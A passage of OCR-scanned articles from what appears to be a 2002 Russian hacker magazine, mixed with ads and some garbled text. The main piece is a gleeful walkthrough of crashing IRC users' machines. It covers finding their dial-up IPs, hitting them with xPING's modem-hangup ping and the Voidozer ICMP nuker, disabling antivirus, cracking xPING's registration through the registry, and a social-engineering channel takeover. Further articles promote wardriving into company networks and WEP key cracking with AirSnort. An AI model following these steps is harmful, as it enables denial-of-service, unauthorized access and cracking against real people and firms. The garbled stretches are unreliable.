вый будет вешать трубку). Пофиксить ее и обезопасить свою задницу 
можно, слазив в «Панель управления/Модемы/Свойства/ Подключе- 
ние/Дополнительно.../Строка инициализации» и прописав там: 
ATS2=255. Это отключит распознавание escape последовательности, кото- 
рая тебе на фиг не нужна. 

Инсталлить прогу не нужно - просто распакуй архив в какую-нибудь ди- 
ру. Получишь: екзешник, readme.txt, pingdata.ini (здесь хранятся три опи- 
санные АТ-команды, но можно добавить и своих) и hosts.ini (сюда нужно 
класть нарытые ТР’шники, чтобы не вводить их с клавы каждый раз). 
Автор, как любой нормальный человек, хочет пива или не пива, поэтому 
рядом с кнопочкой «Жми сюда» (...и пусть тебя не мучает совесть) сто- 
ит цифирь «15». Это число халявных нажимов. Дальше автор предлагает 
тебе прогуляться на канал #IRCToolZ (irc.dal.net:6667) и зарегить тулзу у 


oS Sep с рога м Иры 
Se eee ee ee i te 


Sk ae ae 


‘a ys PY a ae ey Se my 9 ета 
Eh ae aS a a i 
hh oe об 


Точно! Пинком под зад :). 


ГОПНИКИ B IRC 


Hero. Я его там чего-то не нашел, а потому, рассудив здраво, что с серь- 
езной защитой он не парился, просто полез в реестр (для чешек ламобот- 
ных напоминаю: для этого есть тулза regedit.exe в дире с Виндой). В вет- 
ке HKEY_CURRENT_USER/SOFTWARE/XPING/TfmMain меняй параметр 
Registered Ha «yes». Clicks менять бесполезно, так как его максимальное 
значение равно 15, и придется нырять в реестр постоянно (только вот за- 
чем? :)). 
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Сколько клонов расплодилось! 


раде 057 


В ПРОДАЖЕ С 5 НОЯБРЯ 


Продолжение "Демиургов" является фактически игрой дру- 
гого жанра. Притом, что все основополагающие элементы 
остались неизменными, всевозможные мелкие и не очень 
нововведения и доработки окончательно сдвинули акценты 
со стратегии в сторону тактики с сильным ролевым уклоном. 


Вас ожидает 400 лет истории Америки, пролетающие перед 
глазами. Вы сможете приложить руку к таким эпохальным 
баталиям, как кампания Христофора Колумба, кампания 
Писарро, война Текумсе, Семилетняя война, и победно 
завершить этот марш-бросок борьбой за независимость 
США в 1813 году. 


Жанр массовых онлайновых RPG родился ровно пять лет 
назад, и его олицетворением стали всего две буквы — UO. 
Детище Лорда Бритиша отмечает свой пятый день рожденья. 


Звук: экстрим или профессионализм? 
Меняем Duron на Athlon XP 
Покупаем звуковую плату 


preview, review, Loading, советы по прохождению игр, топ 
Игровой трубопровод, 10 ВРС всех времен и народов ит.д. 


Все готово: xPING висит в трее, ты сидишь на ка- 
нале и болтаешь с кем-нибудь для отвода глаз. 
Давай почекаем кого-нибудь. Опов лучше не 
трогать, так как это либо боты, либо перцы, си- 
дящие на толстом канале (хотя не всегда ;)). 
Выбирай себе простую девочку-припевочку или 
мальчика-зайчика, запоминай ники и переклю- 
чайся в окно статуса. В командной строке пиши: 
/dns kisa_vorobyaninoff (ну, или кто там у тебя) 
и дави ентырь. Таким макаром ты обратился к 
службе DNS, которая занимается тем, что резол- 
вит ТР’шники в имена хостов и наоборот. Даль- 
ше ты увидишь такие строчки: 

* Looking up ххх.ххх.ххх.ххх 

* Resolved xxx.xxx.xxx.xxx to name.somehost.ru 
или 

* Unable to resolve ххх.ххх.ххх.ххх 

Итак, у тебя есть теперь 1Р’шник потенциальной 
жертвы... аборта :) и название хоста. Читай на- 
звание. Если там встречается что-то типа dial- 
ир или ррро, или имя какого-то прова, то это 
наш мальчик. Заноси ТР’шник в свой черный 
список. 


ТР’шник у тебя уже есть (ты же об этом всегда 
мечтал). Вбивай его в окошко или выбирай из 
списка, если ты складировал IP в файло 
hosts.ini, галку возле «Пре-пинг» оставь (пусть 
хосты сперва проверяются на доступность) и 
дави кнопку «Жми сюда». Дальше сценарий мо- 
жет развиваться по одному из трех вариантов: 
1) Удаленный хост не отвечает :(. Это значит, 
что там либо сервак с бранмауэром или аноним- 
ная прокся, тогда ловить нечего, либо у ламерю- 
ги настроен файерволл, тогда можно попытать- 
ся без пре-пинга. 

2) Удаленный хост ответил и получил отправ- 
ленный echo request (тот самый пинг с е5с-по- 
следовательностью), и снова ответил, прислав в 
echo reply (ответ Ha ping) наш же мусор. Значит, 
модем без бага. 

3) Удаленный хост ответил, получил злой ping и 
ушел в даун. Ура! Пациент дозрел - ставь рядом 
с его ТР’шником жирную галочку :). 

Если пациент активно общается в это время на 
канале, то реакция в виде отборных трехэтаж- 
ных матов и флейма на любителей запустить в 


канал тр3’шку отчетливо видна. Без слез уми- 
ления смотреть невозможно :). 

Сразу скажу, что повыкидывать с канала всех 
xPING’om не получится, но и челов, подвержен- 
ных баге, не так уж и мало. Я отловил троих на 
одном канале и еще двоих - на другом. Вполне 
достаточно, чтобы поднять себе настроение... 


Если xPING не свалил жертву, совсем не факт, 
что ее не свалит Voidozer. Voidozer - это до- 
вольно грамотный нюкер, который бомбит уда- 
ленную систему сильно фрагментированными 
1СМР-пакетами (тот же пинг, только умный). 
Пока тачка на той стороне пытается собрать 
битые пакеты во что-то удобоваримое, на вход 
валятся все новые и новые куски, таким обра- 
зом дико отжираются ресурсы, и тачка может 
либо подвиснуть, либо рухнуть, осветив окрест- 
ности синим экраном смерти. К сожалению, 
чтобы валить тачки на толстых каналах, тебе 
тоже нужна неслабая кишка. Однако на мопеде 
вполне возможно завалить 98-ю Вынь на дай- 
лапе (мне, например, хватило убогого коннекта 
на 28,8 Kb). Чем мы, собственно, сейчас и зай- 
мемся :). 


Распакуй Voidozer в какую-нибудь диру. При 
этом у тебя жутко начнет материться антивирус, 
например, AVP’wHuk. Не дрейфь - коня там нет, 
просто многие инструкции Voidozer’a похожи на 
слепки виря, вот его и внесли в базу. Кстати, на 
время работы с Voidozer’om антивирь придется 
выключить, чтобы не мешал. Так что готовь фай- 
ерволл, чтобы не сидеть с голой жо... 
Некоторой проблемой для тебя может стать то, 
что Voidozer консольный, то есть его нужно за- 
пускать из командной строки с параметрами: 
voidozer.exe ххх.ххх.ххх.ххх -t 100, где 
ххх.ххх.ххх.ххх - IPWHUK, а 100 - число пакетов. 
Существует Virtual Voidozer II с графической 
оболочкой, однако автор выложил на пагу би- 
тый архив, да еще и просит перечислить ему 
бакс на пиво. Я же отрыл в сети альтернативный 
интерфейс, который ты можешь найти через 
filesearch по запросу «VoidozerFace.rar», размер 
не более 15 килобайтов (сенксы М@\оу’ю). 3a- 
пускай интерфейс, и ты готов к бою. Пошли на 
канал. 


Voidozer кого-то DoSnt... 


ПИНГОМЕТЫ К БОЮ! 

На этот раз я советую тебе лезть в Инет через проксю, потому что твой 
ТР’шник могут запалить и принять контрмеры, правда, это повлияет на 
скорость пинга, которая часто очень критична. Хотя можешь и так. Также 
запусти xPING - он нам пригодится. 

Выбирай симпатичную целочку, запоминай ник и лезь в окно статуса. Ре- 
золвь ТР'’шники (/dns tselka), пока не найдешь дайлапщика. Фигачь ТР в 
xPING и проверяй целку на доступность :). Если все ОК и ник не отпал OT 
xPINGA, вводи адрес в Voidozer. Поставь для начала количество пакетов, 
равное 30, и дави пимпу «Казнить!!!». Откроется окно 005-сессии, где бу- 
дет виден ход DoS-ceccuu :))). Когда Voidozer отработает, пингани 


ТР’шник xPING’om еще разок. Не доступен? Значит, юзер в ауте. Ура! В мо- 
ем случае именно так и получилось: чувак выпал с синим экраном. 

Однако так случается не всегда. Вражий комп потормозит, потормозит да 
и отвиснет обратно, что нас совсем не возрадует. Но у нас есть еще один 
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А вот и первая безвинно павшая жертва :) 


Джокер в рукаве: IRC-cepBak, чтобы не плодить фантомов (мусорные ни- 
ки, оставшиеся от некорректного дисконнекта), время от времени пингу- 
ет ник по ТР’шнику (Ping? Pong!), и если ответа долго нет, выкидывает ник 
из [ВС-сети. Что и требовалось доказать. В общем, ставь число пакетов, 
равное 200, и жди сообщения «Nick покинул IRC (ping timeout)». Гы! Ты 
своего добился :). 


ЧТО МОЖНО ПОИМЕТЬ 


Если ченел ламский и утебя толстенный канал или куча друганов, то мож- 
но задосить всех опов и устроить на ченеле полный сатан с флеймом, флу- 
дом и прочим вопиющим нарушением «канальских» правил - никто вас 
выкинуть не сможет (разве что IRCop). Но есть способ лучше. 

Я решил замахнуться на временный захват канала, и, хотя способ ламер- 
ский, мне почти повезло :). Нужно было протестить опов канала (челов с 
плюшками) на вшивость. И вот после описанных выше действий один из 
опов ушел в даун и покинул IRC по таймауту, причем не понял, что произо- 
шло. Правда, через некоторое время вернулся - пришлось держать его 
под Voidozer’om постоянно. Секи фишку: его ник освободился! На этом ве- 
зение кончилось: ник оказался запоролен, и мне присвоили галимое имя 
опский_ник12345. Пришлось поменять опский_ник на опский_ник_. Это 


ГОПНИКИ B IRC 


проканало. В ходе всех этих пертурбаций другие опы плевали в потолок 
(я фигею!). И тут мне снова повезло. Один из опов, то есть чел, который 
МОЖЕТ ДАТЬ ПЛЮШКУ, обратился ко мне, мол, чувак, чего скачешь туда 
сюда, как горная коза. И я тут же начал некислый развод. Спасите, помо- 
гите, какой-то гад отнял у меня ник! Чел на том конце удивился, мол, он 
же у тебя запаролен, на что я резонно ответил, что знаю, но мне от этого 
не легче. Чел посоветовал написать иркопам, которые имеют доступ к 
NickServ (фича, следящая за регистрацией и доступом к никам). Я сказал, 
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Урря! Mama, я вынес ona! 


что уже написал, и стал ныть, мол, что же мне теперь, как последнему ла- 
му, с таким ником сидеть. И чел уже почти выдал мне заветную плюшку, 
но по моему недосмотру задрюченный, истекающий кровью оп все же ус- 
пел прорваться на канал под другим ником и запалил меня. Оп, которого 
я разводил, заорал: «А это кто?!!», и мне не осталось ничего другого, как 
ответить: «Конь в пальто!!!» - и смыться. 

Если же тебе удалось оплюшиться описанным выше методом, то смело де- 
опай всех опов командой: /mode #канал -000 ник] ник2 никЗ (число «о» 
после минуса должно быть равно числу ников) и владей каналом по пол- 
ной. Правда, ты не сможешь удержать оборону без скриптов, которые бу- 
дут кикать и банить бывших опов, и это все не значит, что ты сможешь за- 
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A ты мне из-за двери: «А это, мля, кто?» 


регить ченел за собой. После дисконнекта все вернется на круги своя. 
Еще ChanServ (сервис, следящий за доступом к каналам) может снять 
плюшку с левого ника, поэтому его лучше зарегить у №сК$егу“а. 


ПОКИДАЯ КАНАЛ 


Вот так можно без напряга убить впустую свое свободное время и полу- 
чить низменное аморальное удовлетворение. На ламских каналах ты да- 
же можешь прослыть элитным хаксором и получить от местных жителей 
плюшку на совершенно законных основаниях. Надеюсь, это все же под- 
толкнет тебя к изучению IRC. Удачи, маза хрякер! 


=r 
=i. 


page 059 


DPAUB)> 


ы вон с чономт 
В PYHAH 


Саламандра (salamander ru) 


За последние несколько лет радиоэзернет приобрел невероятную 
популярность - многие крупные предприятия заменили хабы и 
коммутаторы на беспроводные сетки. Особенно полюбили беспроводной 
доступ крутые начальники с ноутбуками - не надо каждый день в сетку 
втыкать. Но, как ты понимаешь, воздух - он общий, и радиоволны в нем - 
тоже. Как оказалось, войти в чужую радиосеть довольно просто. Что в ней 
делать - это уже на усмотрение. Сразу появилось множество халявщиков, 
которые ходили по улицам с ноутбуками и, поймав сигнал, исходящий от 
какого-нибудь здания, подсоединялись к сетке и залезали в Интернет. 
Создавались целые группировки, которые ездили по родным городам с 
картой и отмечали, где можно законнектиться. В народе такие люди стали 
зваться вардрайверы (wardrivers - Te, кто ездили на тачках) и варвокеры 
(warwalkers - те, кто ходили пешочком). Был, однако, огромный недостаток 
у этих ребят - у каждого халявщика карта своя, и если у тебя такой карты 
нет, то приходится ее либо в И-нете искать (не факт, что она там есть), либо 
самому ее составлять, а эта перспектива отнюдь не ободряет. Так вот, 
сидели как-то кореша-варвокеры со своими ноутбуками в кафе, попивали 
пиво и задушевно беседовали. Один из них рассказал, что видел 
варвокеров, которые нарисовали на асфальте кабинет, приперли офисные 
стульчики, сели на них со своими ноутбуками и прикалывались, изображая 
бурную деятельность. Другой чел подхватил тему и поведал товарищам об 
американских бродягах времен великой депрессии, которые мелом 
рисовали на зданиях значки, предупреждающие собратьев бомжей о злых 
собаках, ментах в гражданской одежде, тюрьмах с клопами, добрых 
хозяйках, бесплатных докторах и т.д. ит.п. 

И тут один перец говорит: «Круто, чуваки!! Давайте помечать мелом 
«бесплатные» здания!!!». Чуваки идею поддержали и называться стали 
варчокерами (чок (chalk) - это по-английски «мел»). Мэтт Джонс, 
которому принадлежала эта гениальная идея, немедленно опубликовал 
ее в Интернете, и уже через неделю все города Европы и Америки были 
изрисованы мелом. 


Теперь немного о каракулях: Мэтт и его друзья налабали 3 знака, которые 
стали классическими среди варчокеров. Конечно, некоторые варчокеры 
от классики отходят, но в таком случае есть вероятность, что их не 
поймут. 


060 december/12/2002 


Здесь живет мент 


Этот символ означает, что сеть открыта, передаваемые сообщения не 
шифруются. Сверху значка пишется SSID (System Set Identifier) - 32- 
значный номер, который аттачат к передаваемым пакетам все машинки, 
входящие в беспроводную сеть. По этому номеру сеть либо считает тебя 
«своим», либо нет. 5510 передается в открытую, поэтому защитой как 
таковой не является. Варчокеры подписывают SSID сверху каждого 
значка, чтобы упростить жизнь товарищам-единомышленникам и чтобы 
эту сеть не спутали с другой. Снизу подписывается скорость коннекта. 


Кружочек означает, что админ установил какую-то одну (или несколько) 
из многочисленных задниц, которые направлены на то, чтобы тебя в 
сеточку не пустить. Чаще всего эти задницы преодолимы и ничего 
страшного в них нет. Сверху, как всегда, - SSID, а внизу - скорость канала. 
Могут быть отметки о способе защиты канала. 

Этой заднице уделили отдельный знак, потому что она слишком часто 
встречается. Здесь передаваемая информация зашифрована с помощью 
алгоритма WEP. Кстати, с Нета уже можно скачать программу, которая 
довольно быстро подбирает к WEP ключ. Некоторые добрые варчокеры 
подписывают ключ WEP рядом с SSID, чтобы собратьям уж совсем 
классно жилось на свете. 


Сами варчокеры считают, что ничего дурного в том, чтобы тырить 
траффик у других, нет, более того, они говорят, что фирмы сами 
приглашают к себе халявщиков тем, что фигово защищают свои сети. На 
своем сайте Мэтт пишет, что открытые сети - как бесплатный толчок, если 
надо сходить, то ты идешь, а чтобы не перепутать с милицейским постом 
висит табличка: общая дыра, мол. На это Мэтту отвечают: «В ресторанах 
тоже бесплатные туалеты. Но туда ходят только посетители ресторана, 
если бы туда ходили все кому ни попадя, то ресторан понес бы убытки - 
клиентам наверняка бы не понравилось, что их покой нарушает 
беспорядочная толпа. А вас, варчокеров, поразвелось нынче, так что вы 
все сети загадите». На что Мэтт отвечает: «Это что же мы в один толчок 
одновременно хезать будем??» - «Да дались тебе эти толчки!!» - «Да, 
дались!! Ты меня засранцем назвал!!» - «Не называл я тебя засранцем! 


Сетка открыта, заходи, чувствуй себя как дома 


Хоть ты этого и заслуживаешь!» - «Ах, так, да?! Ну, держись ты (далее все 
убрано цензурой)!!». 


РАДИО - НАРОДУ!!! 


Как видишь, мнений по поводу «хорошо быть варчокером или плохо» 
довольно много. Движение вызвало много скандалов и немедленно 
приобрело как сторонников, так и врагов. Фирма Нокиа, например, 
считает это кражей. На сайте БиБиСи написано: «Это забавно» (кстати, 
Мэтт - вэб-дизайнер сайта БиБиСи ;-). Один агент ФБР опубликовал 
письмо-обращение, в котором он доводил до сведения бизнесменов, 
что меловые каракули, обнаруженные на фасаде здания, означают 
плохую работу админа. В Канаде фирма Fat Port выпустила некий 
хардвэр, который втыкается между радиоканалом и обычной сетью 
фирмы и не пускает всех непрошеных гостей. Как именно это 
происходит, фирма ЕР не объясняет, зато берет 200 баксов в месяц за 
техническую поддержку свой коробочки. Американская сеть кафе 
Starbucks поставила в каждой пятой забегаловке по беспроводной 
сетке. Садишься пить кофе и в Нете ползаешь, стоит эта радость 12$ в 
час. Правда, у фирмы, которая проводила сеточки для Звездных Баксов, 
можно купить абонемент с неограниченным трафиком и временем - 50$ 
в месяц. В Интернет-магазинах появилась куча шняги, связанной с 


Задница! 


варчоком - футболки с лозунгами типа «Давай поварчокаем вместе, 
детка» или «Бесплатный Интернет по радио - народу!!», появились 
также кепки, шорты и даже мел в модных коробочках со знаком 
открытой сети. Юристы сидят и пытаются сформулировать варчок как- 
нибудь так, чтобы он попадал под действие Уголовного кодекса. Пока 
что у них получилось вот что: начертание мелом каракулей - это 
распространение конфиденциальной информации. Никакой 
ответственности конкретно за варчокерство нет, хотя, конечно, больше 
всего подходит кража и проникновение в частную собственность. 
Наверно, юристы скоро придумают статьи по варчоку. Никто пока даже 


ДРАЙВ И ВОК СЧОКОМ В РУКАХ 


WEP - застраховано, закодировано, заминировано 


не пытался судиться с варчокером. Результат иска просто не оправдал 
бы затраченных средств - все равно всех варчокеров не остановишь, да 
и не очень они наглые - ничего громадного по сетке не качают. Но это 
все про забугорных варчокеров - за бугром они вообще все такие 
культурные, скромные. В России как заметного движения варчокеров 
пока нет, но его появление - в твоих руках. 
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стандарты и способы взлома 
беспроводных сетей 


Radiator (radiator@supermail.ru) 


С наступающим тебя, хацкер :). Выдь на волны, там слон 
раздается. Пока еще раздается... На волнах, всем 
желающим... На радиоволнах идет раздача слонов - там 
лежат бесплатные гигабайты трафика и доступ ко всем 
открытым шарам той локалки, в которую воткнули точку 
доступа. Радиодоступа. Точка. Читай дальше. 


рис. Ильдар Идиатулин 


ЕЩЕ ОДНА СТЕПЕНЬ ТВОЕЙ СВОБОДЫ 

Идея заменить провод между компом и сетью на радиоканал, в общем, не 
так что бы очень новая - ей примерно столько же лет, сколько и локаль- 
ным сетям. Подозреваю, что впервые она приходила в голову еще перво- 
бытным пользователям локальных сетей на заре девяностых годов про- 
шлого века. Они спотыкались о патчкорд, вырывали нахрен розетку из 
стены или корд из машины и вслух мечтали о светлом будущем без прово- 
дов... На заре цивилизации, однако, все сдерживалось примитивными 
технологиями и несовершенством конструкции портативных компьюте- 
ров (знаешь ли ты, что первые ноутбуки весили сорок килограммов, рабо- 
тали на солярке и владельцам приходилось возить их в маленьких тележ- 
ках?). Решительный прорыв был сделан сравнительно недавно, когда ока- 
залось, что мировой кризис - это когда покупать новую технику никто не 
хочет, сколько ни падай. Цены на всю радиошнягу рухнули до пола, и на- 
род потянулся к новому. Первыми, естественно, были директора с ноута- 
ми и секретаршами, затем настала очередь ценных специалистов, а потом 
оказалось, что купить по радиокарте в каждую машину дешевле, чем про- 
кладывать по фирме сеть из проводов. И радио стали брать, как горячие 
пирожки. 


A,B,G СИДЕЛИ НА ТРУБЕ 


Ну, заглянув себе в карман, прямо скажем - не такой уж он и дешевый, 
этот радиохард. Карта в ноут стоит около сотни буказоидов, PCI в десктоп 
чуть дешевле, а точка радиодоступа (то, что втыкают в обычную сетку) от 
двухсот и выше. Причем это Китай, а Киска и Триком - дороже. Поэтому 
нам с тобой, старик, при оснащении нельзя ошибаться и надо выбрать 
правильное железо. Оно, кстати, работает в трех разных стандартах, и с 
выбором стандарта тоже надо определиться сразу. 

Разрабатывает стандарты беспроводных коммуникаций любимый инсти- 
тут IEEE, и называется все это серией IEEE 802.11 с буквами. На сегодня 
изданы и приняты в работу мировой промышленностью стандарты 
802.11а и 802.115. Скоро обещают опубликовать стандарт 802.114, воз- 
можно, к выходу этой статьи он уже будет издан, и появятся первые же- 
лезки. Остальные стандарты пока в работе. 

Самый старый и наиболее проработанный из них - 802.11, он выпущен в 
1999 году. Для его поддержки и распространения была создана ассоциа- 


Радиодоступ открывает огромную дыру 
прямо во внутренней сети фирмы, за всеми 
файрволлами и прокси. 
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ция Wi-Fi Alliance, в ней - очень серьезные организации, и стандарт осво- 
или очень хорошо. 

По имени ассоциации стандарт 802.11 часто называют Wi-Fi. Именно в 
нем работает большинство существующих беспроводных локалок, цены 


eater Е 


Из списка членов Wi-Fi Alliance. Правда, солидно? 


на железо Wi-Fi очень гуманные, и оборудование работает с вполне при- 
личной скоростью - до 11 Мбит в секунду. 

Второй действующий стандарт, 802.11а, выпущен совсем недавно, ему 
чуть больше года. Хард, работающий в стандарте 802.11а, пока что доро- 
гой, его не очень много, но он заметно быстрее - до 54 Мбит в секунду. 

А вот теперь смешное, старик: эти два действующих радиостандарта ра- 
ботают на разных частотах и не понимают друг друга. То есть вообще ни- 
как. И выбор у нас с тобой (и у наших будущих подопечных :) или - или. 
Или быстро, но дорого, или медленно, но дешево и популярно. Вопрос 
сложный, согласись, и для нас с тобой тоже - возьмем не ту карточку, что 
все остальные, и хакать будет некого. 

Принять решение нам поможет 802.119, который, хоть еще и не появился, 
но уже пинается. Дело в том, что он является расширением 802.11 и бу- 
дет работать на той же частоте, будет понимать все железки стандарта 
802.115, но скорость обмена возрастет до 54 Мбит в секунду. Наш выбор, 
таким образом, очевиден: берем 802.11b. 


В НЕБЕ АНГЕЛОЧКИ, А НА ЗЕМЛЕ... 


С чего начинается радиодыра? Наверное, как обычно, все хотят, чтобы бы- 
ло как лучше, а получается как всегда. То ли Большой Босс снова отломал 
сетевой разъем у своего ноутбука, то ли админа достали бесконечные пе- 
реезды из комнаты в комнату и перекладка проводов, но вот однажды на 
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Stumbler выловит доступные сетки 


фирме появляется точка радиодоступа и несколько радиокарточек, сна- 
чала, как правило, в ноутбуках. Админ и инженеры рады - они избавились 
от головной боли, повысили мобильность сотрудников и решили пробле- 
му постоянных переездов. Но радиоволнам стены фирмы не указ, и может 
вполне оказаться, что вход в сеть фирмы по радио работает далеко за ее 
пределами, например, на тротуаре, прямо под окнами, где по странной 
случайности стоим мы с тобой и вертим в руках ноутбук :). То есть еще 
раз: радиодоступ открывает в защите фирмы огромную дыру и открывает 
ее прямо во внутренней сети, за всеми файрволлами и прокси. 

Что это значит для нас, старик? Как минимум, это - халявный скоростной 
Инет, возможность скачать свежую Красную Шапку, музон и веселые картин- 
ки, не потея ночью у момеда. Ну и можно невзначай узнать много интересно- 
го про обслуживающую тебя фирму, как ты понимаешь... Круто, в общем... 


ВЫХОДИМ НА ТРОПУ 


Так, будем считать, что я тебя убедил и ты готов выйти на тропу войны. По- 
хвально, перец, но где ты видел настоящего индейца без лошади и тома- 
гавка? Так-то, Большой Змей, ищи тачку с тонированными стеклами и но- 
утбук. Не забудь найти в ноут карточку стандарта 802.11b. Кстати, евро- 


ДОСТУП В СЕТЬ ИЗ ТРЕХ БУКВ 


пейские могикане очень хвалят карточки ORINOCO, в особенности те, что 
с выносными антеннами. На ноуте желательно иметь любой свежий маз- 
дай и пингвина, чтобы не ограничивать себя в выборе софта. 

Теперь о софте. Netstumbler (http://www.stumbler.net/) работает под 
маздаем, находит и распознает параметры работающих сетей. Это очень 
нужное приложение: дело в том, что сеть тебя не пустит, если ты не наст- 
роишь SSID, это такая строка из 32 символов, которая передается с каж- 
дым пакетом. 5510 у каждой сети своя, ее настраивает админ, а добрый 
Netstumbler тебе ее подскажет, чтобы ты ее прописал в свою карту и был 
в сетке как все. Перед тем как припасть к источнику, о делавар, внима- 
тельно прочти SSID найденной сети, и если там написано что-нибудь типа 
«ne_vlezai_a_to_grohnu», держись подальше - из подъезда могут выбе- 
жать злые апачи и снять с тебя скальп прямо на тротуаре. 


Эмблема проекта Airsnort - летучий поросенок 


Админы некоторых сетей включают встроенное в радиошнягу средство 
шифрования по имени WEP. Тут тебе пригодится § AirSnort 
(http://airsnort.shmoo.com/), он работает в иксах под пингвином и под- 
берет ключ к сети, если достаточно долго послушает ее трафик. 


СКАЗАЛ «ПОЕХАЛИ, И МАХНУЛ... 


Ну а еще возьми в дорогу кусок мела, старик. Если ты еще не прочитал 
статью про варчокеров в этом номере, немедленно прочитай и выучи ус- 
ловные знаки. Кстати, в Европе и Штатах народ в полный рост составляет 
карты родных городов с обозначениями открытых сетей. А некоторые 
фирмы вывешивают возле своих офисов знаки «вход по радио открыт 
всем желающим». Ну да, а в родной стране какие-то шустрые парни уже 
зарегистрировали домен warchalking.ru. Дорога зовет, короче, открытых 


тебе сетей, перец, укрась родной город своей наскальной живописью :). 
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ищем беспроводные сети в Москве 


Андрей «Дронич» Михайлюк (dron 


Из sanucu камеры слеженая Ni2 /двор редакцачал 


Пверь распаннупась, а на пороге появчлся ОН: вы- 
сокого роста, в гряндеран ча поношенной счней 
бандане. Сскамая под мышкой ноутбук, ОН wupoxumu 
waraMu отмерал дорогу к прапаркованной впру- 
TUpKy маленькой машинке, заскочал в нее, завелся 
u пулеб выехал (вылетег!) чз поля зреная камеры... 


За углом Прончч (а ведь это был аменно он) пру- 
тормозал а остановался около гопосующего муж 
чаны в сером пальто U шляпе, натянутой на самые 
глаза. «Ворчокчнгом не увлекаетесь?» - спросчп 
тот в открытое окно правой дверч. «А почему бы ч 
нет?» - промелькнула мысль в голове Прончача, on 
отЕкрил дверь, дождался, пока незнакомец усядется 
поудобнее, u дал газу. На часам было 15.04. 


На бульварном кольце незнакомец нарушил молча- 
Hue: «Может, начнем потчнонечку?». Запустчав руку 
во внутреннай карман пальто, он вытащил оттуда 
небольшой прчборчак, на одном конце которого 
гадывался разъем PCMCIA, a на другом - подобче 
антенны, закатанной в серый шершавый пластчк. 
Прончч остановал машчну ч подключал mpuBopuux 
к ноутбуку. Тот недовольно заверещал, прчняв в 
свое чрево нечзвестное ему устробство, но после 
знакомства с даскетой «Drivers» затан а начал us 
редка помаргавать пампочкой на mpuGope, показы- 
вая готовность к работе. «Ну что, поемалч?» - 
спросчл незнакомец, бесцеремонно полокал ноут- 
бук на колена U открыл два окна - одно в машчне, 
а другое в операцаонной счстеме. В заголовке вто- 
рого угадывалась надпась Network Stumbier.. 


Карточку D-Link DWL-650 Wireless LAN 
PCMCIA Card для эксперимента 
предоставили наши друзья из компании 
«Остров Формоза», а ноутбук и машинку 
героически пожертвовал Дронич. 
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Эээх, давненько не устраивали мы выездных мероприятий! 
Все сидим, как крысы корабельные, в своем трюме и 
перебиваемся с хлеба на воду (то есть с пива на чипсы :)}, 
изредка развлекая себя нюканьем ть фриканьем и 
прочим кардингом. Надоело! Ctr-Alt- él, Logoff user Dronich. 


Bppp, что-то с Ниро переобщался :). Так что вся ответственность за стиль 
и настроение на его плечах. Нет, теперь только балет и керамика! А то ши- 
зофрения и паранойя семимильными шагами идут в массы :). Хотя на са- 
MOM деле все так примерно и было - подключив к моему ноутбуку Wireless 
LAN адаптер D-Link DWL-650, мы в компании с Федором Добрянским от- 
правились путешествовать по Москве в поисках беспроводных сетей с от- 
крытым доступом и добрым админом (а лучше вообще без него). 


СУХИЕ ФАКТЫ 


Я думаю, что статью про ворчокинг ты уже прочитал, так что рассказом об 
истории и теории хакинга по воздуху грузить тебя не буду. Наша задача 
была до боли тривиальна: объехать все переулки центра Москвы и про- 
сканить воздушное пространство на предмет присутствия беспроводных 
сетей при помощи программы Network Stumbler. Так что оставшаяся часть 
статьи - это хронология нашей поездки и подведение итогов. 


ХОРОШЕЕ НАЧАЛО 


Отъехав на десяток километров от центра Москвы, мы заприметили белень- 
кое здание со здоровенной пижней на крыше. Где-то я его видел, но вот где? 
Ладно, воспоминания потом, может быть тут кроется зловещий радиоэзер- 
нет? Лампочка на приборе это подтвердила - перестав изредка помаргивать 
(так она сообщала нам, что ищет сеть, но найти не может), она зацвела яр- 
ким зеленым цветом. Ага, есть! Но не успел Stumbler опросить сетку на пред- 


Радио в Москве 


СПЕЦ НА ТРОПЕ ВОЙНЫ 


мет адаптеров, SSID и прочей технической мутоты, как к нашей машине по- 
спешили два муссоршмидта, покинувших свою охранную будку. Перспекти- 
ва встречи с ними мало меня обрадовала, тем более, что один из них уже на- 
чал бубнить что-то в свою рацию. Так что пришлось пульнуть с места (спа- 
сибо раллийному движку!) и исчезнуть из их поля зрения (спасибо немытым 
номерам). Заезжая за угол, я краем глаза заметил вывеску этого странного 
предприятия. Мать-перемать! Пять веселых букв - ФАПСИ :). А здание было 
знакомо потому, что фотка его висела на их официальном сайте. В общем, 
мы тронулись сушить штаны и радоваться, что не успели подконнектиться к 
их сети, так как это значило, что и они к нам вломиться не успели :). 


Вторым пунктом назначения стала точка, известная в народе как М9. Если 
ты ходил/ездил по Профсоюзной и ее окрестностям, то не мог не заметить 
домика общажного типа, который почему-то окружен тройным забором. А 
за забором тем - грибница спутниковых и еще-хэ-зэ-каких антенн. Это и 
есть знаменитая точка обмена трафиком с забугорьем. Правда, губы при- 
шлось закатать - за оба круга, которые мы совершили вдоль третьего забо- 
ра, лампочка скромно показывала наличие сигнала, но декодировать его не 
могла. Стамблер тоже упорно молчал. Было обидно («такое место, а мы...»), 
но причина неудачи нашлась - в сформулированном Федей виде она звучит 
примерно так: «поскольку они используют направленные антенны, переда- 
ющие сигнал за полгорода, мы не можем вклиниться и заловить этот сигнал, 
потому что тогда нам придется встать на дороге радиоволн, а они летят 
очень высоко» :). Времена меняются, Федор остается :). Ориентируясь по 
добытой Федей же карте, мы посетили еще несколько мест, стоящих на пу- 
ти радиоволн, но тщетно - сигнал совсем не хотел ловиться. И тогда на по- 
пытки поймать сеть через «длинный» канал пришлось забить и отправить- 
ся на поиски сеток местного значения. Карту взаимодействия направлен- 
ных антенн в Москве ищи на скринах - может, спаяешь себе направленный 
девайс (при чтении этих строк в глазах Добрянского загорелся нездоровый 
огонек) и поимеешь себе немереную халяву. 


Чем отличается направленная антенна от радиоточки? Да буквально 
всем! Направленная приемо-передающая антенна смотрит на такую же, 
расположенную за много километров от нее, а радиоточка дает стабиль- 
ный сигнал в радиусе 50-100 метров максимум. То есть сотрудники и босс 
могут гулять по офису, не теряя коннекта. А значит, можно попробовать 
стать внештатным сотрудником :). 

Надеясь найти беспроводные сети на предприятиях и в организациях, мы 
посетили ГУМ, ЦУМ, торговый комплекс «Охотный ряд» (ака Манежка), 
МГУ на Воробьевых горах и еще кучу «типа перспективных мест». И нигде 
не нашли даже какого-нибудь легенького намека на коннект :(. Точно так 
же завершились поиски доступных офисов в центре города, никаких тебе 
беспроводных сетей. На карте ты можешь проследить за нашим маршру- 
том (с позиции «сюда я не пойду»). 


Выводы напрашиваются неутешительные - либо в стране нет радиоэзер- 
нета вовсе, либо мы копали не там. И судя по бурному развитию компа- 
